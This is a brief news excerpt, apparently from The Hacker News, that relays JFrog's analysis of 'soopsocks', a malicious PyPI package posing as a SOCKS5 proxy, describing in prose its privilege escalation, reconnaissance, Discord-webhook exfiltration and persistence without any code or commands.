"JFrog said in an analysis. The executable ("_AUTORUN.EXE") is a compiled Go file that, besides including a SOCKS5 implementation as advertised, is also designed to run PowerShell scripts, set firewall rules, and relaunch itself with elevated permissions. It also carries out basic system and network reconnaissance, including Internet Explorer security settings and Windows installation date, and exfiltrates the information to a hard-coded Discord webhook."
""_AUTORUN.VBS," the Visual Basic Script launched by the Python package in versions 0.2.5 and 0.2.6, is also capable of running a PowerShell script, which then downloads a ZIP file containing the legitimate Python binary from an external domain ("install.soop[.]space:6969") and generates a batch script that's configured to install the package using the "pip install" command and run it. The PowerShell script then invokes the batch script, causing the Python package to be executed, which, in turn, elevates itself to run with administrative privileges"
soopsocks was uploaded to PyPI by user "soodalpie" on September 26, 2025, and accumulated 2,653 downloads before removal. The package advertised SOCKS5 proxy functionality while embedding backdoor-like behavior and automated installation mechanisms targeting Windows. The compiled Go executable "_AUTORUN.EXE" implemented SOCKS5, executed PowerShell scripts, set firewall rules, relaunched with elevated permissions, performed system and network reconnaissance including Internet Explorer security settings and Windows install date, and exfiltrated data to a hard-coded Discord webhook. The Visual Basic script "_AUTORUN.VBS" and PowerShell payload downloaded a ZIP with a legitimate Python binary, generated a batch to pip-install and run the package, elevated privileges, configured port 1080 firewall rules, installed as a service, maintained Discord communication, and created scheduled-task persistence.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]